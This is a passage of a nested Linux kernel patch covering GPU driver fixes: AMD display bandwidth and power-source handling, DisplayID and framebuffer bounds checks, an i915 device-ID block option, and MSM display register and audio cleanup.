++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							if (v->Outbpp == BPP_INVALID && v->PHYCLKD18PerState[k] < 13500.0 / 18.0 &&
++								v->DSCEnable[k] == true && v->ForcedOutputLinkBPP[k] == 0) {
++								v->RequiresDSC[i][k] = true;
++								v->LinkDSCEnable = true;
++								v->Outbpp = TruncToValidBPP(
++										(1.0 - v->Downspreading / 100.0) * 10000,
++										v->OutputLinkDPLanes[k],
++										v->HTotal[k],
++										v->HActive[k],
++										v->PixelClockBackEnd[k],
++										v->ForcedOutputLinkBPP[k],
++										v->LinkDSCEnable,
++										v->Output[k],
++										v->OutputFormat[k],
++										v->DSCInputBitPerComponent[k],
++										v->NumberOfDSCSlices[k],
++										v->AudioSampleRate[k],
++										v->AudioSampleLayout[k],
++										v->ODMCombineEnablePerState[i][k]);
++							}
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " UHBR10"
++						}
++						if (v->Outbpp == BPP_INVALID &&
++							(v->OutputLinkDPRate[k] == dm_dp_rate_na || v->OutputLinkDPRate[k] == dm_dp_rate_uhbr13p5) &&
++							v->PHYCLKD18PerState[k] >= 13500.0 / 18.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 13500,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							if (v->Outbpp == BPP_INVALID && v->PHYCLKD18PerState[k] < 20000.0 / 18.0 &&
++								v->DSCEnable[k] == true && v->ForcedOutputLinkBPP[k] == 0) {
++								v->RequiresDSC[i][k] = true;
++								v->LinkDSCEnable = true;
++								v->Outbpp = TruncToValidBPP(
++										(1.0 - v->Downspreading / 100.0) * 13500,
++										v->OutputLinkDPLanes[k],
++										v->HTotal[k],
++										v->HActive[k],
++										v->PixelClockBackEnd[k],
++										v->ForcedOutputLinkBPP[k],
++										v->LinkDSCEnable,
++										v->Output[k],
++										v->OutputFormat[k],
++										v->DSCInputBitPerComponent[k],
++										v->NumberOfDSCSlices[k],
++										v->AudioSampleRate[k],
++										v->AudioSampleLayout[k],
++										v->ODMCombineEnablePerState[i][k]);
++							}
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " UHBR13p5"
++						}
++						if (v->Outbpp == BPP_INVALID &&
++							(v->OutputLinkDPRate[k] == dm_dp_rate_na || v->OutputLinkDPRate[k] == dm_dp_rate_uhbr20) &&
++							v->PHYCLKD18PerState[k] >= 20000.0 / 18.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 20000,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							if (v->Outbpp == BPP_INVALID && v->DSCEnable[k] == true &&
++								v->ForcedOutputLinkBPP[k] == 0) {
++								v->RequiresDSC[i][k] = true;
++								v->LinkDSCEnable = true;
++								v->Outbpp = TruncToValidBPP(
++										(1.0 - v->Downspreading / 100.0) * 20000,
++										v->OutputLinkDPLanes[k],
++										v->HTotal[k],
++										v->HActive[k],
++										v->PixelClockBackEnd[k],
++										v->ForcedOutputLinkBPP[k],
++										v->LinkDSCEnable,
++										v->Output[k],
++										v->OutputFormat[k],
++										v->DSCInputBitPerComponent[k],
++										v->NumberOfDSCSlices[k],
++										v->AudioSampleRate[k],
++										v->AudioSampleLayout[k],
++										v->ODMCombineEnablePerState[i][k]);
++							}
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " UHBR20"
++						}
++					} else {
++						v->Outbpp = BPP_INVALID;
++						if (v->PHYCLKPerState[i] >= 270.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 2700,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR"
++						}
++						if (v->Outbpp == BPP_INVALID && v->PHYCLKPerState[i] >= 540.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 5400,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR2"
++						}
++						if (v->Outbpp == BPP_INVALID && v->PHYCLKPerState[i] >= 810.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 8100,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR3"
++						}
+ 					}
+ 				}
+ 			} else {
+@@ -5192,7 +5286,7 @@ void dml314_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_
+ 							v->DETBufferSizeCThisState[k],
+ 							&v->UrgentBurstFactorCursorPre[k],
+ 							&v->UrgentBurstFactorLumaPre[k],
+-							&v->UrgentBurstFactorChroma[k],
++							&v->UrgentBurstFactorChromaPre[k],
+ 							&v->NotUrgentLatencyHidingPre[k]);
+ 				}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+index e02e9d4b04a95..2bb768413c92a 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+@@ -3333,7 +3333,7 @@ void dml32_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							/* Output */
+ 							&mode_lib->vba.UrgentBurstFactorCursorPre[k],
+ 							&mode_lib->vba.UrgentBurstFactorLumaPre[k],
+-							&mode_lib->vba.UrgentBurstFactorChroma[k],
++							&mode_lib->vba.UrgentBurstFactorChromaPre[k],
+ 							&mode_lib->vba.NotUrgentLatencyHidingPre[k]);
+ 				}
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index 6d03459de5612..91dfc229e34d7 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -723,6 +723,24 @@ static int smu_late_init(void *handle)
+ 		return ret;
+ 	}
+ 
++	/*
++	 * Explicitly notify PMFW the power mode the system in. Since
++	 * the PMFW may boot the ASIC with a different mode.
++	 * For those supporting ACDC switch via gpio, PMFW will
++	 * handle the switch automatically. Driver involvement
++	 * is unnecessary.
++	 */
++	if (!smu->dc_controlled_by_gpio) {
++		ret = smu_set_power_source(smu,
++					   adev->pm.ac_power ? SMU_POWER_SOURCE_AC :
++					   SMU_POWER_SOURCE_DC);
++		if (ret) {
++			dev_err(adev->dev, "Failed to switch to %s mode!\n",
++				adev->pm.ac_power ? "AC" : "DC");
++			return ret;
++		}
++	}
++
+ 	if ((adev->ip_versions[MP1_HWIP][0] == IP_VERSION(13, 0, 1)) ||
+ 	    (adev->ip_versions[MP1_HWIP][0] == IP_VERSION(13, 0, 3)))
+ 		return 0;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
+index 0bcd4fe0ef177..ca278280865fa 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
+@@ -3406,26 +3406,8 @@ static int navi10_post_smu_init(struct smu_context *smu)
+ 		return 0;
+ 
+ 	ret = navi10_run_umc_cdr_workaround(smu);
+-	if (ret) {
++	if (ret)
+ 		dev_err(adev->dev, "Failed to apply umc cdr workaround!\n");
+-		return ret;
+-	}
+-
+-	if (!smu->dc_controlled_by_gpio) {
+-		/*
+-		 * For Navi1X, manually switch it to AC mode as PMFW
+-		 * may boot it with DC mode.
+-		 */
+-		ret = smu_v11_0_set_power_source(smu,
+-						 adev->pm.ac_power ?
+-						 SMU_POWER_SOURCE_AC :
+-						 SMU_POWER_SOURCE_DC);
+-		if (ret) {
+-			dev_err(adev->dev, "Failed to switch to %s mode!\n",
+-					adev->pm.ac_power ? "AC" : "DC");
+-			return ret;
+-		}
+-	}
+ 
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index ea4ec937f52e5..9dd92bbdcefdc 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -1767,6 +1767,7 @@ static const struct pptable_funcs smu_v13_0_7_ppt_funcs = {
+ 	.enable_mgpu_fan_boost = smu_v13_0_7_enable_mgpu_fan_boost,
+ 	.get_power_limit = smu_v13_0_7_get_power_limit,
+ 	.set_power_limit = smu_v13_0_set_power_limit,
++	.set_power_source = smu_v13_0_set_power_source,
+ 	.get_power_profile_mode = smu_v13_0_7_get_power_profile_mode,
+ 	.set_power_profile_mode = smu_v13_0_7_set_power_profile_mode,
+ 	.set_tool_table_location = smu_v13_0_set_tool_table_location,
+diff --git a/drivers/gpu/drm/drm_displayid.c b/drivers/gpu/drm/drm_displayid.c
+index 38ea8203df45b..7d03159dc1461 100644
+--- a/drivers/gpu/drm/drm_displayid.c
++++ b/drivers/gpu/drm/drm_displayid.c
+@@ -7,13 +7,28 @@
+ #include <drm/drm_edid.h>
+ #include <drm/drm_print.h>
+ 
++static const struct displayid_header *
++displayid_get_header(const u8 *displayid, int length, int index)
++{
++	const struct displayid_header *base;
++
++	if (sizeof(*base) > length - index)
++		return ERR_PTR(-EINVAL);
++
++	base = (const struct displayid_header *)&displayid[index];
++
++	return base;
++}
++
+ static int validate_displayid(const u8 *displayid, int length, int idx)
+ {
+ 	int i, dispid_length;
+ 	u8 csum = 0;
+ 	const struct displayid_header *base;
+ 
+-	base = (const struct displayid_header *)&displayid[idx];
++	base = displayid_get_header(displayid, length, idx);
++	if (IS_ERR(base))
++		return PTR_ERR(base);
+ 
+ 	DRM_DEBUG_KMS("base revision 0x%x, length %d, %d %d\n",
+ 		      base->rev, base->bytes, base->prod_id, base->ext_count);
+diff --git a/drivers/gpu/drm/drm_fb_helper.c b/drivers/gpu/drm/drm_fb_helper.c
+index 06cd2f8c27734..76e46713b2f0c 100644
+--- a/drivers/gpu/drm/drm_fb_helper.c
++++ b/drivers/gpu/drm/drm_fb_helper.c
+@@ -708,19 +708,27 @@ static void drm_fb_helper_damage(struct fb_info *info, u32 x, u32 y,
+ static void drm_fb_helper_memory_range_to_clip(struct fb_info *info, off_t off, size_t len,
+ 					       struct drm_rect *clip)
+ {
++	u32 line_length = info->fix.line_length;
++	u32 fb_height = info->var.yres;
+ 	off_t end = off + len;
+ 	u32 x1 = 0;
+-	u32 y1 = off / info->fix.line_length;
++	u32 y1 = off / line_length;
+ 	u32 x2 = info->var.xres;
+-	u32 y2 = DIV_ROUND_UP(end, info->fix.line_length);
++	u32 y2 = DIV_ROUND_UP(end, line_length);
++
++	/* Don't allow any of them beyond the bottom bound of display area */
++	if (y1 > fb_height)
++		y1 = fb_height;
++	if (y2 > fb_height)
++		y2 = fb_height;
+ 
+ 	if ((y2 - y1) == 1) {
+ 		/*
+ 		 * We've only written to a single scanline. Try to reduce
+ 		 * the number of horizontal pixels that need an update.
+ 		 */
+-		off_t bit_off = (off % info->fix.line_length) * 8;
+-		off_t bit_end = (end % info->fix.line_length) * 8;
++		off_t bit_off = (off % line_length) * 8;
++		off_t bit_end = (end % line_length) * 8;
+ 
+ 		x1 = bit_off / info->var.bits_per_pixel;
+ 		x2 = DIV_ROUND_UP(bit_end, info->var.bits_per_pixel);
+diff --git a/drivers/gpu/drm/drm_mipi_dsi.c b/drivers/gpu/drm/drm_mipi_dsi.c
+index f25ddfe37498f..853208e8dd736 100644
+--- a/drivers/gpu/drm/drm_mipi_dsi.c
++++ b/drivers/gpu/drm/drm_mipi_dsi.c
+@@ -221,7 +221,7 @@ mipi_dsi_device_register_full(struct mipi_dsi_host *host,
+ 		return dsi;
+ 	}
+ 
+-	dsi->dev.of_node = info->node;
++	device_set_node(&dsi->dev, of_fwnode_handle(info->node));
+ 	dsi->channel = info->channel;
+ 	strlcpy(dsi->name, info->type, sizeof(dsi->name));
+ 
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_g2d.h b/drivers/gpu/drm/exynos/exynos_drm_g2d.h
+index 74ea3c26deadc..1a5ae781b56c6 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_g2d.h
++++ b/drivers/gpu/drm/exynos/exynos_drm_g2d.h
+@@ -34,11 +34,11 @@ static inline int exynos_g2d_exec_ioctl(struct drm_device *dev, void *data,
+ 	return -ENODEV;
+ }
+ 
+-int g2d_open(struct drm_device *drm_dev, struct drm_file *file)
++static inline int g2d_open(struct drm_device *drm_dev, struct drm_file *file)
+ {
+ 	return 0;
+ }
+ 
+-void g2d_close(struct drm_device *drm_dev, struct drm_file *file)
++static inline void g2d_close(struct drm_device *drm_dev, struct drm_file *file)
+ { }
+ #endif
+diff --git a/drivers/gpu/drm/i915/Kconfig b/drivers/gpu/drm/i915/Kconfig
+index 3a6e176d77aa5..6b10868ec72ff 100644
+--- a/drivers/gpu/drm/i915/Kconfig
++++ b/drivers/gpu/drm/i915/Kconfig
+@@ -54,23 +54,34 @@ config DRM_I915
+ 	  If "M" is selected, the module will be called i915.
+ 
+ config DRM_I915_FORCE_PROBE
+-	string "Force probe driver for selected new Intel hardware"
++	string "Force probe i915 for selected Intel hardware IDs"
+ 	depends on DRM_I915
+ 	help
+ 	  This is the default value for the i915.force_probe module
+ 	  parameter. Using the module parameter overrides this option.
+ 
+-	  Force probe the driver for new Intel graphics devices that are
+-	  recognized but not properly supported by this kernel version. It is
+-	  recommended to upgrade to a kernel version with proper support as soon
+-	  as it is available.
++	  Force probe the i915 driver for Intel graphics devices that are
++	  recognized but not properly supported by this kernel version. Force
++	  probing an unsupported device taints the kernel. It is recommended to
++	  upgrade to a kernel version with proper support as soon as it is
++	  available.
++
++	  It can also be used to block the probe of recognized and fully
++	  supported devices.
+ 
+ 	  Use "" to disable force probe. If in doubt, use this.
+ 
+-	  Use "<pci-id>[,<pci-id>,...]" to force probe the driver for listed
++	  Use "<pci-id>[,<pci-id>,...]" to force probe the i915 for listed
+ 	  devices. For example, "4500" or "4500,4571".
+ 
+-	  Use "*" to force probe the driver for all known devices.
++	  Use "*" to force probe the driver for all known devices. Not
++	  recommended.
++
++	  Use "!" right before the ID to block the probe of the device. For
++	  example, "4500,!4571" forces the probe of 4500 and blocks the probe of
++	  4571.
++
++	  Use "!*" to block the probe of the driver for all known devices.
+ 
+ config DRM_I915_CAPTURE_ERROR
+ 	bool "Enable capturing GPU state following a hang"
+diff --git a/drivers/gpu/drm/i915/display/intel_atomic_plane.c b/drivers/gpu/drm/i915/display/intel_atomic_plane.c
+index aaa6708256d58..82826454b5e83 100644
+--- a/drivers/gpu/drm/i915/display/intel_atomic_plane.c
++++ b/drivers/gpu/drm/i915/display/intel_atomic_plane.c
+@@ -988,7 +988,7 @@ intel_prepare_plane_fb(struct drm_plane *_plane,
+ 	int ret;
+ 
+ 	if (old_obj) {
+-		const struct intel_crtc_state *crtc_state =
++		const struct intel_crtc_state *new_crtc_state =
+ 			intel_atomic_get_new_crtc_state(state,
+ 							to_intel_crtc(old_plane_state->hw.crtc));
+ 
+@@ -1003,7 +1003,7 @@ intel_prepare_plane_fb(struct drm_plane *_plane,
+ 		 * This should only fail upon a hung GPU, in which case we
+ 		 * can safely continue.
+ 		 */
+-		if (intel_crtc_needs_modeset(crtc_state)) {
++		if (new_crtc_state && intel_crtc_needs_modeset(new_crtc_state)) {
+ 			ret = i915_sw_fence_await_reservation(&state->commit_ready,
+ 							      old_obj->base.resv, NULL,
+ 							      false, 0,
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index 2e09899f2f927..b1653308f1450 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -1512,6 +1512,11 @@ static int intel_dp_dsc_compute_config(struct intel_dp *intel_dp,
+ 		pipe_config->dsc.slice_count =
+ 			drm_dp_dsc_sink_max_slice_count(intel_dp->dsc_dpcd,
+ 							true);
++		if (!pipe_config->dsc.slice_count) {
++			drm_dbg_kms(&dev_priv->drm, "Unsupported Slice Count %d\n",
++				    pipe_config->dsc.slice_count);
++			return -EINVAL;
++		}
+ 	} else {
+ 		u16 dsc_max_output_bpp;
+ 		u8 dsc_dp_slice_count;
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
+index 1e1fa20fb41c9..18a8466f85917 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
+@@ -30,12 +30,14 @@
+ 	{ FORCEWAKE_MT,             0,      0, "FORCEWAKE" }
+ 
+ #define COMMON_GEN9BASE_GLOBAL \
+-	{ GEN8_FAULT_TLB_DATA0,     0,      0, "GEN8_FAULT_TLB_DATA0" }, \
+-	{ GEN8_FAULT_TLB_DATA1,     0,      0, "GEN8_FAULT_TLB_DATA1" }, \
+ 	{ ERROR_GEN6,               0,      0, "ERROR_GEN6" }, \
+ 	{ DONE_REG,                 0,      0, "DONE_REG" }, \
+ 	{ HSW_GTT_CACHE_EN,         0,      0, "HSW_GTT_CACHE_EN" }
+ 
++#define GEN9_GLOBAL \
++	{ GEN8_FAULT_TLB_DATA0,     0,      0, "GEN8_FAULT_TLB_DATA0" }, \
++	{ GEN8_FAULT_TLB_DATA1,     0,      0, "GEN8_FAULT_TLB_DATA1" }
++
+ #define COMMON_GEN12BASE_GLOBAL \
+ 	{ GEN12_FAULT_TLB_DATA0,    0,      0, "GEN12_FAULT_TLB_DATA0" }, \
+ 	{ GEN12_FAULT_TLB_DATA1,    0,      0, "GEN12_FAULT_TLB_DATA1" }, \
+@@ -136,6 +138,7 @@ static const struct __guc_mmio_reg_descr xe_lpd_blt_inst_regs[] = {
+ static const struct __guc_mmio_reg_descr default_global_regs[] = {
+ 	COMMON_BASE_GLOBAL,
+ 	COMMON_GEN9BASE_GLOBAL,
++	GEN9_GLOBAL,
+ };
+ 
+ static const struct __guc_mmio_reg_descr default_rc_class_regs[] = {
+diff --git a/drivers/gpu/drm/i915/i915_params.c b/drivers/gpu/drm/i915/i915_params.c
+index d1e4d528cb174..5b24dd50fb6a4 100644
+--- a/drivers/gpu/drm/i915/i915_params.c
++++ b/drivers/gpu/drm/i915/i915_params.c
+@@ -122,7 +122,7 @@ i915_param_named_unsafe(enable_psr2_sel_fetch, bool, 0400,
+ 	"Default: 0");
+ 
+ i915_param_named_unsafe(force_probe, charp, 0400,
+-	"Force probe the driver for specified devices. "
++	"Force probe options for specified supported devices. "
+ 	"See CONFIG_DRM_I915_FORCE_PROBE for details.");
+ 
+ i915_param_named_unsafe(disable_power_well, int, 0400,
+diff --git a/drivers/gpu/drm/i915/i915_pci.c b/drivers/gpu/drm/i915/i915_pci.c
+index a2efc0b9d50c8..efa80475fbfed 100644
+--- a/drivers/gpu/drm/i915/i915_pci.c
++++ b/drivers/gpu/drm/i915/i915_pci.c
+@@ -1252,7 +1252,7 @@ static void i915_pci_remove(struct pci_dev *pdev)
+ }
+ 
+ /* is device_id present in comma separated list of ids */
+-static bool force_probe(u16 device_id, const char *devices)
++static bool device_id_in_list(u16 device_id, const char *devices, bool negative)
+ {
+ 	char *s, *p, *tok;
+ 	bool ret;
+@@ -1261,7 +1261,9 @@ static bool force_probe(u16 device_id, const char *devices)
+ 		return false;
+ 
+ 	/* match everything */
+-	if (strcmp(devices, "*") == 0)
++	if (negative && strcmp(devices, "!*") == 0)
++		return true;
++	if (!negative && strcmp(devices, "*") == 0)
+ 		return true;
+ 
+ 	s = kstrdup(devices, GFP_KERNEL);
+@@ -1271,6 +1273,12 @@ static bool force_probe(u16 device_id, const char *devices)
+ 	for (p = s, ret = false; (tok = strsep(&p, ",")) != NULL; ) {
+ 		u16 val;
+ 
++		if (negative && tok[0] == '!')
++			tok++;
++		else if ((negative && tok[0] != '!') ||
++			 (!negative && tok[0] == '!'))
++			continue;
++
+ 		if (kstrtou16(tok, 16, &val) == 0 && val == device_id) {
+ 			ret = true;
+ 			break;
+@@ -1282,6 +1290,16 @@ static bool force_probe(u16 device_id, const char *devices)
+ 	return ret;
+ }
+ 
++static bool id_forced(u16 device_id)
++{
++	return device_id_in_list(device_id, i915_modparams.force_probe, false);
++}
++
++static bool id_blocked(u16 device_id)
++{
++	return device_id_in_list(device_id, i915_modparams.force_probe, true);
++}
++
+ bool i915_pci_resource_valid(struct pci_dev *pdev, int bar)
+ {
+ 	if (!pci_resource_flags(pdev, bar))
+@@ -1309,10 +1327,9 @@ static int i915_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		(struct intel_device_info *) ent->driver_data;
+ 	int err;
+ 
+-	if (intel_info->require_force_probe &&
+-	    !force_probe(pdev->device, i915_modparams.force_probe)) {
++	if (intel_info->require_force_probe && !id_forced(pdev->device)) {
+ 		dev_info(&pdev->dev,
+-			 "Your graphics device %04x is not properly supported by the driver in this\n"
++			 "Your graphics device %04x is not properly supported by i915 in this\n"
+ 			 "kernel version. To force driver probe anyway, use i915.force_probe=%04x\n"
+ 			 "module parameter or CONFIG_DRM_I915_FORCE_PROBE=%04x configuration option,\n"
+ 			 "or (recommended) check for kernel updates.\n",
+@@ -1320,6 +1337,18 @@ static int i915_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		return -ENODEV;
+ 	}
+ 
++	if (id_blocked(pdev->device)) {
++		dev_info(&pdev->dev, "I915 probe blocked for Device ID %04x.\n",
++			 pdev->device);
++		return -ENODEV;
++	}
++
++	if (intel_info->require_force_probe) {
++		dev_info(&pdev->dev, "Force probing unsupported Device ID %04x, tainting kernel\n",
++			 pdev->device);
++		add_taint(TAINT_USER, LOCKDEP_STILL_OK);
++	}
++
+ 	/* Only bind to function 0 of the device. Early generations
+ 	 * used function 1 as a placeholder for multi-head. This causes
+ 	 * us confusion instead, especially on the systems where both
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_interrupts.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_interrupts.c
+index cf1b6d84c18a3..75e1b89c9eacf 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_interrupts.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_interrupts.c
+@@ -15,7 +15,7 @@
+ 
+ /*
+  * Register offsets in MDSS register file for the interrupt registers
+- * w.r.t. to the MDP base
++ * w.r.t. the MDP base
+  */
+ #define MDP_SSPP_TOP0_OFF		0x0
+ #define MDP_INTF_0_OFF			0x6A000
+@@ -24,6 +24,9 @@
+ #define MDP_INTF_3_OFF			0x6B800
+ #define MDP_INTF_4_OFF			0x6C000
+ #define MDP_INTF_5_OFF			0x6C800
++#define INTF_INTR_EN			0x1c0
++#define INTF_INTR_STATUS		0x1c4
++#define INTF_INTR_CLEAR			0x1c8
+ #define MDP_AD4_0_OFF			0x7C000
+ #define MDP_AD4_1_OFF			0x7D000
+ #define MDP_AD4_INTR_EN_OFF		0x41c
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
+index 7ce66bf3f4c8d..b2a94b9a3e987 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
+@@ -56,11 +56,6 @@
+ #define   INTF_TPG_RGB_MAPPING          0x11C
+ #define   INTF_PROG_FETCH_START         0x170
+ #define   INTF_PROG_ROT_START           0x174
+-
+-#define   INTF_FRAME_LINE_COUNT_EN      0x0A8
+-#define   INTF_FRAME_COUNT              0x0AC
+-#define   INTF_LINE_COUNT               0x0B0
+-
+ #define   INTF_MUX                      0x25C
+ 
+ #define INTF_CFG_ACTIVE_H_EN	BIT(29)
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_wb.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_wb.c
+index 2d28afdf860ef..a3e413d277175 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_wb.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_wb.c
+@@ -61,6 +61,7 @@ static const struct dpu_wb_cfg *_wb_offset(enum dpu_wb wb,
+ 	for (i = 0; i < m->wb_count; i++) {
+ 		if (wb == m->wb[i].id) {
+ 			b->blk_addr = addr + m->wb[i].base;
++			b->log_mask = DPU_DBG_MASK_WB;
+ 			return &m->wb[i];
+ 		}
+ 	}
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hwio.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_hwio.h
+index c8156ed4b7fb8..93081e82c6d74 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hwio.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hwio.h
+@@ -20,9 +20,6 @@
+ #define HIST_INTR_EN                    0x01c
+ #define HIST_INTR_STATUS                0x020
+ #define HIST_INTR_CLEAR                 0x024
+-#define INTF_INTR_EN                    0x1C0
+-#define INTF_INTR_STATUS                0x1C4
+-#define INTF_INTR_CLEAR                 0x1C8
+ #define SPLIT_DISPLAY_EN                0x2F4
+ #define SPLIT_DISPLAY_UPPER_PIPE_CTRL   0x2F8
+ #define DSPP_IGC_COLOR0_RAM_LUTN        0x300
+diff --git a/drivers/gpu/drm/msm/dp/dp_audio.c b/drivers/gpu/drm/msm/dp/dp_audio.c
+index 6666783e1468e..1245c7aa49df8 100644
+--- a/drivers/gpu/drm/msm/dp/dp_audio.c
++++ b/drivers/gpu/drm/msm/dp/dp_audio.c
+@@ -593,6 +593,18 @@ static struct hdmi_codec_pdata codec_data = {
+ 	.i2s = 1,
+ };
+ 
++void dp_unregister_audio_driver(struct device *dev, struct dp_audio *dp_audio)
++{
++	struct dp_audio_private *audio_priv;
++
++	audio_priv = container_of(dp_audio, struct dp_audio_private, dp_audio);
++
++	if (audio_priv->audio_pdev) {
++		platform_device_unregister(audio_priv->audio_pdev);
++		audio_priv->audio_pdev = NULL;
++	}
++}
++
+ int dp_register_audio_driver(struct device *dev,
+ 		struct dp_audio *dp_audio)
+ {
+diff --git a/drivers/gpu/drm/msm/dp/dp_audio.h b/drivers/gpu/drm/msm/dp/dp_audio.h
+index 84e5f4a5d26ba..4ab78880af829 100644
+--- a/drivers/gpu/drm/msm/dp/dp_audio.h
++++ b/drivers/gpu/drm/msm/dp/dp_audio.h
+@@ -53,6 +53,8 @@ struct dp_audio *dp_audio_get(struct platform_device *pdev,
+ int dp_register_audio_driver(struct device *dev,
+ 		struct dp_audio *dp_audio);
+ 
